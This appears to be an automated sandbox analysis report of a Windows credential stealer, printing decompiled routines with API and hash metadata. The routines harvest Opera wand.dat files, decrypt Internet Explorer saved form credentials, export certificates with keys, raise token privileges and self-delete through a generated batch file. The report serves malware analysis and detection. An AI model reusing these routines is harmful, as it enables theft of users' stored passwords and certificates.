                                                                        					if(_t36 + 1 == 0) {
                                                                        						goto L14;
                                                                        					} else {
                                                                        						goto L4;
                                                                        					}
                                                                        					do {
                                                                        						L4:
                                                                        						if((_v324.dwFileAttributes & 0x00000010) != 0) {
                                                                        							if(lstrcmpiA(0x414806,  &( &_v324->cFileName)) != 0) {
                                                                        								if(lstrcmpiA(0x414808,  &( &_v324->cFileName)) != 0) {
                                                                        									_v336 =  &( &_v324->cFileName);
                                                                        									_t48 = E00401D69(E00401D15(_a8, "\\"), _v336);
                                                                        									_v340 = _t48;
                                                                        									_push(_t48);
                                                                        									if(StrStrIA(_v340, "opera") != 0) {
                                                                        										E00408789(_t54, _a4, _v340, "wand.dat");
                                                                        									}
                                                                        									E004017D5();
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						_t39 = FindNextFileA(_v328,  &_v324); // executed
                                                                        					} while (_t39 != 0);
                                                                        					FindClose(_v328); // executed
                                                                        					goto L14;
                                                                        				}
                                                                        			}














                                                                        APIs
                                                                        • FindFirstFileA.KERNEL32(00000000,?,?,0000013E,?,\*.*), ref: 00408962
                                                                        • lstrcmpiA.KERNEL32(00414806,?,00000000,?,?,0000013E,?,\*.*), ref: 00408995
                                                                        • lstrcmpiA.KERNEL32(00414808,?,00414806,?,00000000,?,?,0000013E,?,\*.*), ref: 004089AF
                                                                        • StrStrIA.SHLWAPI(?,opera,00000000,00000000,?,?,004140DA,00414808,?,00414806,?,00000000,?,?,0000013E,?), ref: 004089F4
                                                                        • FindNextFileA.KERNEL32(?,?,00000000,?,?,0000013E,?,\*.*), ref: 00408A22
                                                                        • FindClose.KERNEL32(?,?,?,00000000,?,?,0000013E,?,\*.*), ref: 00408A35
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Find$Filelstrcmpi$CloseFirstNext
                                                                        • String ID: \*.*$opera$wand.dat
                                                                        • API String ID: 3663067366-3278183560
                                                                        • Opcode ID: 1bd784044f2d9d81a96e3d763f7a4310ff7d8f45acf7507539dad856e19f9394
                                                                        • Instruction ID: c71bf560eb1c7fb0c09b774ce167880e188dc30df44f9e3f007173dba5e297e0
                                                                        • Opcode Fuzzy Hash: 1bd784044f2d9d81a96e3d763f7a4310ff7d8f45acf7507539dad856e19f9394
                                                                        • Instruction Fuzzy Hash: BF312C7190011DAADF61AB61CD42BED7775AF44308F1440ABB54CB61B1DA789EC08F59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 88%
                                                                        			E00403F86(void* __ecx, intOrPtr _a4, char* _a8, char* _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                        				struct _WIN32_FIND_DATAA _v324;
                                                                        				void* _v328;
                                                                        				CHAR* _v332;
                                                                        				char* _v336;
                                                                        				char* _t44;
                                                                        				CHAR* _t48;
                                                                        				void* _t52;
                                                                        				int _t58;
                                                                        				void* _t67;
                                                                        				void* _t73;
                                                                        				void* _t77;
                                                                        				signed int* _t78;
                                                                        
                                                                        				_t77 = __ecx;
                                                                        				_v332 = 0;
                                                                        				_t44 = _a8;
                                                                        				if(_t44 == 0 ||  *_t44 == 0) {
                                                                        					L25:
                                                                        					return E004017D5(_v332);
                                                                        				} else {
                                                                        					if(E004024D7(_a8) != 0) {
                                                                        						_t48 = E00401D15(_a8, "*.*");
                                                                        					} else {
                                                                        						_t48 = E00401D15(_a8, "\*.*");
                                                                        					}
                                                                        					_v332 = _t48;
                                                                        					E00401803( &_v324, 0x13e);
                                                                        					_t52 = FindFirstFileA(_v332,  &_v324); // executed
                                                                        					_v328 = _t52;
                                                                        					if(_t52 + 1 != 0) {
                                                                        						do {
                                                                        							_t78 =  &_v324;
                                                                        							if(( *_t78 & 0x00000010) == 0) {
                                                                        								_v336 =  &(_t78[0xb]);
                                                                        								if(_a12 != 0) {
                                                                        									if(StrStrIA(_v336, _a12) == 0) {
                                                                        										goto L23;
                                                                        									}
                                                                        									L19:
                                                                        									_t73 = E00401D69(E00401D15(_a8, "\\"), _v336);
                                                                        									_push(_t73);
                                                                        									if(_a20 == 0) {
                                                                        										E00403E4C(_a4, _t73, _a16);
                                                                        									} else {
                                                                        										_a20(_a4, _t73, _a16);
                                                                        									}
                                                                        									E004017D5();
                                                                        									goto L23;
                                                                        								}
                                                                        								goto L19;
                                                                        							}
                                                                        							if(lstrcmpiA(0x414806,  &(_t78[0xb])) != 0) {
                                                                        								if(lstrcmpiA(0x414808,  &( &_v324->cFileName)) != 0) {
                                                                        									if(E004024D7(_a8) != 0) {
                                                                        										_t67 = E00401D15(_a8, 0);
                                                                        									} else {
                                                                        										_t67 = E00401D15(_a8, "\\"); // executed
                                                                        									}
                                                                        									E00403F86(_t77, _a4, E00401D69(_t67,  &( &_v324->cFileName)), _a12, _a16, _a20); // executed
                                                                        									E004017D5(_t68);
                                                                        								}
                                                                        							}
                                                                        							L23:
                                                                        							_t58 = FindNextFileA(_v328,  &_v324); // executed
                                                                        						} while (_t58 != 0);
                                                                        						FindClose(_v328); // executed
                                                                        					}
                                                                        					goto L25;
                                                                        				}
                                                                        			}
















                                                                        APIs
                                                                        • FindFirstFileA.KERNEL32(00000000,?,?,0000013E,?,*.*,?), ref: 00403FF6
                                                                        • lstrcmpiA.KERNEL32(00414806,?,00000000,?,?,0000013E,?,*.*,?), ref: 00404023
                                                                        • lstrcmpiA.KERNEL32(00414808,?,00414806,?,00000000,?,?,0000013E,?,*.*,?), ref: 00404040
                                                                        • FindNextFileA.KERNEL32(?,?,?,00000000,00000000,?,?,0000013E,?,*.*,?), ref: 0040410A
                                                                        • FindClose.KERNEL32(?,?,?,?,00000000,00000000,?,?,0000013E,?,*.*,?), ref: 0040411D
                                                                          • Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D36
                                                                          • Part of subcall function 00401D15: lstrlenA.KERNEL32(?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D40
                                                                          • Part of subcall function 00401D15: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000), ref: 00401D54
                                                                          • Part of subcall function 00401D15: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401D5D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                                                                        • String ID: *.*$\*.*
                                                                        • API String ID: 3040542784-1692270452
                                                                        • Opcode ID: 19f221371bcf29dc0fb006707e9f4b1343e817989a724613998be1342034dd9f
                                                                        • Instruction ID: 0e5482085a8478f848b24922490d45c82c48751e20b01fa21e1f70377cfbccc4
                                                                        • Opcode Fuzzy Hash: 19f221371bcf29dc0fb006707e9f4b1343e817989a724613998be1342034dd9f
                                                                        • Instruction Fuzzy Hash: 90413DB150010DAADF21AF61DC02BEE7B79AF84308F1080B7B609B54B1D77D9EA09B59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 52%
                                                                        			E0040A364(void* __ecx, intOrPtr _a4, WCHAR* _a8, short* _a12) {
                                                                        				char _v24;
                                                                        				char _v44;
                                                                        				signed int _v48;
                                                                        				intOrPtr _v52;
                                                                        				char _v56;
                                                                        				intOrPtr _v60;
                                                                        				void* _v64;
                                                                        				char _v68;
                                                                        				void* _v72;
                                                                        				char _v76;
                                                                        				void* _v80;
                                                                        				char _v84;
                                                                        				signed int _t50;
                                                                        				intOrPtr _t66;
                                                                        				intOrPtr _t67;
                                                                        				void* _t80;
                                                                        				signed int _t81;
                                                                        				void* _t84;
                                                                        				void* _t85;
                                                                        
                                                                        				_t80 = __ecx;
                                                                        				_t50 = lstrlenW(_a8);
                                                                        				if(_t50 != 0) {
                                                                        					E00403459(_t80, _a8, (_t50 << 1) + 2,  &_v24);
                                                                        					_t81 = 0;
                                                                        					_v48 = 0;
                                                                        					while(_t81 < 0x14) {
                                                                        						_v48 = _v48 + ( *(_t81 +  &_v24) & 0x000000ff);
                                                                        						_t81 = _t81 + 1;
                                                                        					}
                                                                        					_t84 = 0;
                                                                        					_v52 = 0;
                                                                        					while(_t84 < 0x14) {
                                                                        						_push( *(_t84 +  &_v24) & 0x000000ff);
                                                                        						wsprintfA( &_v44, "%02X");
                                                                        						_t85 = _t85 + 0xc;
                                                                        						_v52 = E00401D69(_v52,  &_v44);
                                                                        						_t84 = _t84 + 1;
                                                                        					}
                                                                        					_v48 = _v48 & 0x000000ff;
                                                                        					_push(_v48);
                                                                        					wsprintfA( &_v44, "%02X");
                                                                        					_v52 = E00401D69(_v52,  &_v44);
                                                                        					_t66 = E00401C8E( *0x4140fe, "Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", _v52,  &_v56); // executed
                                                                        					_t67 = _t66;
                                                                        					if(_t67 != 0) {
                                                                        						_v60 = _t67;
                                                                        						if(_v56 != 0) {
                                                                        							_v84 = (lstrlenW(_a8) << 1) + 2;
                                                                        							_push(_a8);
                                                                        							_pop( *_t30);
                                                                        							_push(_v56);
                                                                        							_pop( *_t32);
                                                                        							_push(_v60);
                                                                        							_pop( *_t34);
                                                                        							_v72 = 0;
                                                                        							if( *0x41442d != 0) {
                                                                        								_push( &_v76);
                                                                        								_push(1);
                                                                        								_push(0);
                                                                        								_push(0);
                                                                        								_push( &_v84);
                                                                        								_push(0);
                                                                        								_push( &_v68);
                                                                        								if( *0x41442d() != 0 && _v72 != 0) {
                                                                        									if(_a12 != 0) {
                                                                        										 *_a12 = 0x3f;
                                                                        									}
                                                                        									E0040A13B(0xbeef0003, _a8, _v72, _v76, _a4);
                                                                        									LocalFree(_v72);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						E004017D5(_v60);
                                                                        					}
                                                                        					return E004017D5(_v52);
                                                                        				} else {
                                                                        					return _t50;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • lstrlenW.KERNEL32(?), ref: 0040A36E
                                                                        • wsprintfA.USER32 ref: 0040A3EB
                                                                        • lstrlenW.KERNEL32(?,Software\Microsoft\Internet Explorer\IntelliForms\Storage2,?,?,?,?,?,?), ref: 0040A431
                                                                        • CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 0040A474
                                                                        • LocalFree.KERNEL32(00000000,?,?), ref: 0040A4AB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrlen$CryptDataFreeLocalUnprotectwsprintf
                                                                        • String ID: %02X$Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                                                                        • API String ID: 1926481713-2450551051
                                                                        • Opcode ID: 10276d0c1c107ec45e6a45a57df5954478425b079aa56ba185906d5e51d0d003
                                                                        • Instruction ID: ee62826d35bb7334c94dec01f225b0295fce8fff2f3ff85087ea3677e24ce983
                                                                        • Opcode Fuzzy Hash: 10276d0c1c107ec45e6a45a57df5954478425b079aa56ba185906d5e51d0d003
                                                                        • Instruction Fuzzy Hash: BF414972810218EBDF119BE1EC45BEEBB79AF08314F04403AF910B51A1E7B89965DB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00404FD8(void* __ecx, intOrPtr _a4, char* _a8, intOrPtr _a12) {
                                                                        				struct _WIN32_FIND_DATAA _v324;
                                                                        				void* _v328;
                                                                        				CHAR* _v332;
                                                                        				char** _v336;
                                                                        				char* _t31;
                                                                        				void* _t40;
                                                                        
                                                                        				_v332 = 0;
                                                                        				_t31 = _a8;
                                                                        				if(_t31 == 0 ||  *_t31 == 0) {
                                                                        					L12:
                                                                        					return E004017D5(_v332);
                                                                        				} else {
                                                                        					E00404F77(_a4, E00401D15(_a8, _a12)); // executed
                                                                        					E004017D5(_t33);
                                                                        					_v332 = E00401D15(_a8, "\*.*");
                                                                        					E00401803( &_v324, 0x13e);
                                                                        					_t40 = FindFirstFileA(_v332,  &_v324); // executed
                                                                        					_v328 = _t40;
                                                                        					if(_t40 + 1 == 0) {
                                                                        						goto L12;
                                                                        					} else {
                                                                        						goto L4;
                                                                        					}
                                                                        					do {
                                                                        						L4:
                                                                        						if((_v324.dwFileAttributes & 0x00000010) != 0) {
                                                                        							if(lstrcmpiA(0x414806,  &( &_v324->cFileName)) != 0) {
                                                                        								if(lstrcmpiA(0x414808,  &( &_v324->cFileName)) != 0) {
                                                                        									_v336 =  &( &_v324->cFileName);
                                                                        									E00404F77(_a4, E00401D69(E00401D69(E00401D15(_a8, "\\"), _v336), _a12));
                                                                        									E004017D5(_t53);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					} while (FindNextFileA(_v328,  &_v324) != 0);
                                                                        					FindClose(_v328);
                                                                        					goto L12;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • FindFirstFileA.KERNEL32(00000000,?,?,0000013E,?,\*.*,00000000,?,?), ref: 00405047
                                                                        • lstrcmpiA.KERNEL32(00414806,?,00000000,?,?,0000013E,?,\*.*,00000000,?,?), ref: 00405076
                                                                        • lstrcmpiA.KERNEL32(00414808,?,00414806,?,00000000,?,?,0000013E,?,\*.*,00000000,?,?), ref: 00405090
                                                                        • FindNextFileA.KERNEL32(?,?,00000000,?,?,0000013E,?,\*.*,00000000,?,?), ref: 004050E8
                                                                        • FindClose.KERNEL32(?,?,?,00000000,?,?,0000013E,?,\*.*,00000000,?,?), ref: 004050FB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Find$Filelstrcmpi$CloseFirstNext
                                                                        • String ID: \*.*
                                                                        • API String ID: 3663067366-1173974218
                                                                        • Opcode ID: 1e9dea5cfd5ce7fabfaf121f709474c518a1ee34b0066c664dc39b055b9c7958
                                                                        • Instruction ID: b26a634762e2f79233f71d3dbaa1eefbd2c1f05767a16118d2fd1dfdcfdb69c5
                                                                        • Opcode Fuzzy Hash: 1e9dea5cfd5ce7fabfaf121f709474c518a1ee34b0066c664dc39b055b9c7958
                                                                        • Instruction Fuzzy Hash: 7731FE71800119AADF21AF61CC42BEE7779EF44308F5440B7B508B61B1D7789E909E99
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 87%
                                                                        			E00402896(CHAR* _a4, intOrPtr _a8) {
                                                                        				struct _LUID _v12;
                                                                        				void* _v16;
                                                                        				int _v20;
                                                                        				void* _v24;
                                                                        				void* _v28;
                                                                        				struct _TOKEN_PRIVILEGES _v32;
                                                                        				int _t19;
                                                                        				int _t28;
                                                                        				void* _t30;
                                                                        
                                                                        				if( *0x414421 == 0 ||  *0x414425 == 0 ||  *0x41440d == 0) {
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t30 = 0;
                                                                        					_v16 = 0;
                                                                        					_t19 = LookupPrivilegeValueA(0, _a4,  &_v12); // executed
                                                                        					if(_t19 != 0) {
                                                                        						if(OpenProcessToken(GetCurrentProcess(), 0x20,  &_v16) != 0) {
                                                                        							_v32.PrivilegeCount = 1;
                                                                        							 *_t7 = _v12.LowPart;
                                                                        							_push(_v12.HighPart);
                                                                        							_pop( *_t9);
                                                                        							if(_a8 == 0) {
                                                                        								_v20 = 0;
                                                                        							} else {
                                                                        								_v20 = 2;
                                                                        							}
                                                                        						}
                                                                        						_t28 = AdjustTokenPrivileges(_v16, 0,  &_v32, 0x10, 0, 0); // executed
                                                                        						if(_t28 != 0) {
                                                                        							_t30 = _t30 + 1;
                                                                        						}
                                                                        					}
                                                                        					if(_v16 != 0) {
                                                                        						CloseHandle(_v16); // executed
                                                                        					}
                                                                        					return _t30;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 004028D1
                                                                        • GetCurrentProcess.KERNEL32 ref: 004028DB
                                                                        • OpenProcessToken.ADVAPI32(00000000,00000020,00000000), ref: 004028E9
                                                                        • AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000010,00000000,00000000), ref: 0040292B
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040293F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                                                        • String ID:
                                                                        • API String ID: 3038321057-0
                                                                        • Opcode ID: 76fe5268ac12f0dce08d9f682dd04652f32c605f293811f82a7e5bc11f3d74ac
                                                                        • Instruction ID: cba0a7666c283167117d827dc397d8696115836664d693015db956b6612b46f1
                                                                        • Opcode Fuzzy Hash: 76fe5268ac12f0dce08d9f682dd04652f32c605f293811f82a7e5bc11f3d74ac
                                                                        • Instruction Fuzzy Hash: 53116076A00209EBEB119F90ED4DBEE7BB8FB44309F148136A151B51E0D7F84694CB5D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 46%
                                                                        			E0040D423(intOrPtr __edx, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				CHAR** _v16;
                                                                        				CHAR* _v20;
                                                                        				char _v24;
                                                                        				char _v28;
                                                                        				char _v32;
                                                                        				char _v36;
                                                                        				intOrPtr _v40;
                                                                        				intOrPtr _t48;
                                                                        				int _t50;
                                                                        				int _t54;
                                                                        				CHAR** _t59;
                                                                        				CHAR** _t62;
                                                                        				CHAR** _t66;
                                                                        				CHAR** _t71;
                                                                        				intOrPtr _t79;
                                                                        				CHAR** _t81;
                                                                        				void* _t82;
                                                                        
                                                                        				_t79 = __edx;
                                                                        				_v8 = E0040150D(_a4, 0x48, 0);
                                                                        				if( *0x414431 != 0 &&  *0x414435 != 0 &&  *0x41443d != 0 &&  *0x4143f9 != 0 &&  *0x4143fd != 0 &&  *0x414401 != 0 &&  *0x414405 != 0 &&  *0x414439 != 0) {
                                                                        					_t48 =  *0x414431(0, 0x416057); // executed
                                                                        					_v12 = _t48;
                                                                        					if(_v12 != 0) {
                                                                        						_t82 = 0;
                                                                        						while(1) {
                                                                        							_t82 =  *0x414435(_v12, _t82);
                                                                        							_t94 = _t82;
                                                                        							if(_t82 == 0) {
                                                                        								break;
                                                                        							}
                                                                        							_t79 =  *((intOrPtr*)(_t82 + 0xc));
                                                                        							_v16 =  *((intOrPtr*)(_t79 + 0x68));
                                                                        							_t81 =  *(_t79 + 0x6c);
                                                                        							__eflags = _t81;
                                                                        							if(__eflags != 0) {
                                                                        								while(1) {
                                                                        									__eflags = _v16;
                                                                        									if(__eflags == 0) {
                                                                        										goto L28;
                                                                        									}
                                                                        									_t50 = lstrcmpA( *_t81, "2.5.29.37");
                                                                        									__eflags = _t50;
                                                                        									if(_t50 == 0) {
                                                                        										__eflags = _t81[2];
                                                                        										if(_t81[2] != 0) {
                                                                        											_v20 = E004017EC(_t81[2]);
                                                                        											E00401823(_t81[3], _v20, _t81[2]);
                                                                        											_t54 = lstrcmpA(_v20, 0x416064);
                                                                        											__eflags = _t54;
                                                                        											if(_t54 == 0) {
                                                                        												_t59 =  *0x41443d(_t82, 0, 0,  &_v24,  &_v28, 0);
                                                                        												__eflags = _t59;
                                                                        												if(_t59 != 0) {
                                                                        													_t62 =  *0x4143f9(_v24, _v28,  &_v32);
                                                                        													__eflags = _t62;
                                                                        													if(_t62 != 0) {
                                                                        														_t66 =  *0x4143fd(_v32, 0, 7, 0, 0,  &_v36);
                                                                        														__eflags = _t66;
                                                                        														if(_t66 != 0) {
                                                                        															_v40 = E004017EC(_v36);
                                                                        															_t71 =  *0x4143fd(_v32, 0, 7, 0, _v40,  &_v36);
                                                                        															__eflags = _t71;
                                                                        															if(_t71 != 0) {
                                                                        																E00401486(_a4, 0xbeef0000);
                                                                        																E004014BC(_a4,  *((intOrPtr*)(_t82 + 4)),  *((intOrPtr*)(_t82 + 8)));
                                                                        																E004014BC(_a4, _v40, _v36);
                                                                        															}
                                                                        															E004017D5(_v40);
                                                                        														}
                                                                        														 *0x414401(_v32);
                                                                        													}
                                                                        													 *0x414405(_v24, 0);
                                                                        												}
                                                                        											}
                                                                        											E004017D5(_v20);
                                                                        										}
                                                                        									}
                                                                        									_t81 =  &(_t81[4]);
                                                                        									_t40 =  &_v16;
                                                                        									 *_t40 = _v16 - 1;
                                                                        									__eflags =  *_t40;
                                                                        								}
                                                                        							}
                                                                        							L28:
                                                                        						}
                                                                        						 *0x414439(_v12, 0);
                                                                        					}
                                                                        				}
                                                                        				return E00401553(_t79, _t94, _a4, _v8);
                                                                        			}























                                                                        APIs
                                                                        • CertOpenSystemStoreA.CRYPT32(00000000,00416057), ref: 0040D4A9
                                                                        • lstrcmpA.KERNEL32(?,2.5.29.37), ref: 0040D4F3
                                                                          • Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA
                                                                        • lstrcmpA.KERNEL32(?,00416064,00000000,?,00000000,00000000,?,2.5.29.37), ref: 0040D52B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrcmp$AllocCertLocalOpenStoreSystem
                                                                        • String ID: 2.5.29.37
                                                                        • API String ID: 1553736721-3842544949
                                                                        • Opcode ID: 64adb788d90f03cf86861941f5e287a351f777ca5d64e8a737ecca4751077718
                                                                        • Instruction ID: b03ba2e338ee9a7ca6125fe278e81a7799858116ed9091dcfd2150a7fa4cb223
                                                                        • Opcode Fuzzy Hash: 64adb788d90f03cf86861941f5e287a351f777ca5d64e8a737ecca4751077718
                                                                        • Instruction Fuzzy Hash: 71516936900219FADF22AF90CC0ABEEBB71EB48304F148036F515751F0CB7A6995DB68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 48%
                                                                        			E00402896(CHAR* _a4, intOrPtr _a8) {
                                                                        				struct _LUID _v12;
                                                                        				void* _v16;
                                                                        				int _v20;
                                                                        				void* _v24;
                                                                        				void* _v28;
                                                                        				struct _TOKEN_PRIVILEGES _v32;
                                                                        				int _t19;
                                                                        				void* _t23;
                                                                        				int _t28;
                                                                        				void* _t30;
                                                                        
                                                                        				if( *0x414421 == 0 ||  *0x414425 == 0 ||  *0x41440d == 0) {
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t30 = 0;
                                                                        					_v16 = 0;
                                                                        					_t19 = LookupPrivilegeValueA(0, _a4,  &_v12); // executed
                                                                        					if(_t19 != 0) {
                                                                        						_t23 = GetCurrentProcess();
                                                                        						_push( &_v16);
                                                                        						_push(0x20);
                                                                        						_push(_t23);
                                                                        						if( *0x41440d() != 0) {
                                                                        							_v32.PrivilegeCount = 1;
                                                                        							 *_t7 = _v12.LowPart;
                                                                        							_push(_v12.HighPart);
                                                                        							_pop( *_t9);
                                                                        							if(_a8 == 0) {
                                                                        								_v20 = 0;
                                                                        							} else {
                                                                        								_v20 = 2;
                                                                        							}
                                                                        						}
                                                                        						_t28 = AdjustTokenPrivileges(_v16, 0,  &_v32, 0x10, 0, 0); // executed
                                                                        						if(_t28 != 0) {
                                                                        							_t30 = _t30 + 1;
                                                                        						}
                                                                        					}
                                                                        					if(_v16 != 0) {
                                                                        						CloseHandle(_v16); // executed
                                                                        					}
                                                                        					return _t30;
                                                                        				}
                                                                        			}














                                                                        APIs
                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,?,?,00000001), ref: 004028D1
                                                                        • GetCurrentProcess.KERNEL32 ref: 004028DB
                                                                        • AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000010,00000000,00000000), ref: 0040292B
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040293F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AdjustCloseCurrentHandleLookupPrivilegePrivilegesProcessTokenValue
                                                                        • String ID:
                                                                        • API String ID: 1569164952-0
                                                                        • Opcode ID: 76fe5268ac12f0dce08d9f682dd04652f32c605f293811f82a7e5bc11f3d74ac
                                                                        • Instruction ID: cba0a7666c283167117d827dc397d8696115836664d693015db956b6612b46f1
                                                                        • Opcode Fuzzy Hash: 76fe5268ac12f0dce08d9f682dd04652f32c605f293811f82a7e5bc11f3d74ac
                                                                        • Instruction Fuzzy Hash: 53116076A00209EBEB119F90ED4DBEE7BB8FB44309F148136A151B51E0D7F84694CB5D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004106D5(void* __eax, void* __edx, void* __eflags) {
                                                                        				CHAR* _v8;
                                                                        				char* _v12;
                                                                        				void* _v16;
                                                                        				char* _v20;
                                                                        				CHAR* _v24;
                                                                        				char* _t34;
                                                                        				char* _t35;
                                                                        				void* _t39;
                                                                        				void* _t43;
                                                                        				void* _t45;
                                                                        				struct HINSTANCE__* _t49;
                                                                        				char* _t59;
                                                                        				void* _t60;
                                                                        
                                                                        				_v24 = E004017EC(0x105);
                                                                        				wsprintfA(_v24, "%d.bat", GetTickCount());
                                                                        				_v8 = E004017EC(0x105);
                                                                        				_t34 = E004017EC(0x105);
                                                                        				_v20 = _t34;
                                                                        				_t35 = E004017EC(0x105);
                                                                        				_v12 = _t35;
                                                                        				GetModuleFileNameA( *0x4176b6, _v8, 0x104);
                                                                        				if(GetTempPathA(0x104, _v20) != 0) {
                                                                        					lstrcatA(_v20, _v24);
                                                                        				}
                                                                        				_t39 = CreateFileA(_v20, 0xc0000000, 3, 0, 2, 0, 0); // executed
                                                                        				_v16 = _t39;
                                                                        				if((_t39 + 0x00000001 & _t39 + 0x00000001) != 0) {
                                                                        					L6:
                                                                        					_t43 = E004013C2(_v16, "\r\n\t\t\r\n\r\n\t   :ktk   \r\n\r\n\r\n     del    \t %1  \r\n\tif  \t\t exist \t   %1  \t  goto \t\r ktk\r\n del \t  %0 ", lstrlenA("\r\n\t\t\r\n\r\n\t   :ktk   \r\n\r\n\r\n     del    \t %1  \r\n\tif  \t\t exist \t   %1  \t  goto \t\r ktk\r\n del \t  %0 ")); // executed
                                                                        					CloseHandle(_v16);
                                                                        					_t45 = _t43;
                                                                        					if(_t45 != 0) {
                                                                        						wsprintfA(_v12, "      \"%s\"   ", _v8);
                                                                        						_t49 = LoadLibraryA("shell32.dll");
                                                                        						if(_t49 != 0 && GetProcAddress(_t49, "ShellExecuteA") != 0) {
                                                                        							ShellExecuteA(0, "open", _v20, _v12, 0, 0); // executed
                                                                        						}
                                                                        					}
                                                                        					L11:
                                                                        					E004017D5(_v24);
                                                                        					E004017D5(_v8);
                                                                        					E004017D5(_v20);
                                                                        					return E004017D5(_v12);
                                                                        				}
                                                                        				lstrcpyA(_v20, _v8);
                                                                        				_t59 = StrRChrIA(_v20, 0, 0x5c);
                                                                        				if(_t59 != 0) {
                                                                        					lstrcpyA(_t59 + 1, _v24);
                                                                        				}
                                                                        				_t60 = CreateFileA(_v20, 0xc0000000, 3, 0, 2, 0, 0);
                                                                        				_v16 = _t60;
                                                                        				if(_t60 + 1 == 0) {
                                                                        					goto L11;
                                                                        				} else {
                                                                        					goto L6;
                                                                        				}
                                                                        			}

















                                                                        APIs
                                                                          • Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA
                                                                        • GetTickCount.KERNEL32 ref: 004106FA
                                                                        • wsprintfA.USER32 ref: 00410708
                                                                        • GetModuleFileNameA.KERNEL32(00000000,00000104,00000105,00000105,00000105,?,?,00000105), ref: 00410768
                                                                        • GetTempPathA.KERNEL32(00000104,?,00000000,00000104,00000105,00000105,00000105,?,?,00000105), ref: 0041077E
                                                                        • lstrcatA.KERNEL32(?,?,00000104,?,00000000,00000104,00000105,00000105,00000105,?,?,00000105), ref: 00410792
                                                                        • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,00000000,00000104,00000105,00000105,00000105), ref: 004107AB
                                                                        • lstrcpyA.KERNEL32(?,00000000,?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,00000000,00000104,00000105,00000105,00000105), ref: 004107C2
                                                                        • StrRChrIA.SHLWAPI(?,00000000,0000005C,?,00000000,?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,00000000,00000104), ref: 004107CE
                                                                        • lstrcpyA.KERNEL32(00000001,?,?,00000000,0000005C,?,00000000,?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?), ref: 004107DC
